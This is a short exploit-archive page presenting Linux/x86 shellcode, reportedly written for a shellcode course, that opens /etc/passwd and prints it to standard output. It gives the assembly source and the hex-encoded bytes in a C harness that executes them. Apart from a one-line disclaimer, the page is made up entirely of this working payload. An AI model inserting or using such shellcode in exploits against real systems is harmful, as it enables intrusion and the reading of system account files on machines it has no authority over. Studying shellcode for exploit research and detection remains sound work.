Linux/x86 read /etc/passwd shellcode (62 bytes) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-05-10 | Type : shellcode | Platform : linux_x86
This exploit / vulnerability Linux/x86 read /etc/passwd shellcode (62 bytes) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

/*
; Title : Linux/x86 - Read /etc/passwd Shellcode (62 bytes)
; Date : May, 2018
; Author : Nuno Freitas
; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-polymorphing-shellcodes/
; Twitter : @nunof11
; SLAE ID : SLAE-1112
; Size : 62 bytes
; Tested on : i686 GNU/Linux

section .text

global _start

_start:
xor eax, eax
jmp two

one:
pop ebx
mov al, 0x5
int 0x80
mov esi, eax
jmp read

exit:
mov al, 0x1
xor ebx, ebx
int 0x80

read:
mov ebx, esi
mov al, 0x3
mov ecx, esp
mov dl, 0x01
int 0x80

xor ebx, ebx
cmp eax, ebx
je exit

mov al, 0x4
mov bl, 0x1
int 0x80

inc esp
jmp read

two:
call one
string: db "/etc/passwd"
*/

#include <stdio.h>
#include <string.h>

unsigned char shellcode[] = \
"\x31\xc9\xf7\xe1\xeb\x28\x5b\xb0\x05\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x89\xe1\xb2\x01\xcd\x80\x31\xdb\x39\xd8\x74\xea\xb0\x04\xb3\x01\xcd\x80\x44\xeb\xe7\xe8\xd3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";

void main()
{
printf("Shellcode Length: %d\n", strlen(shellcode));

int (*ret)() = (int(*)())shellcode;
ret();
}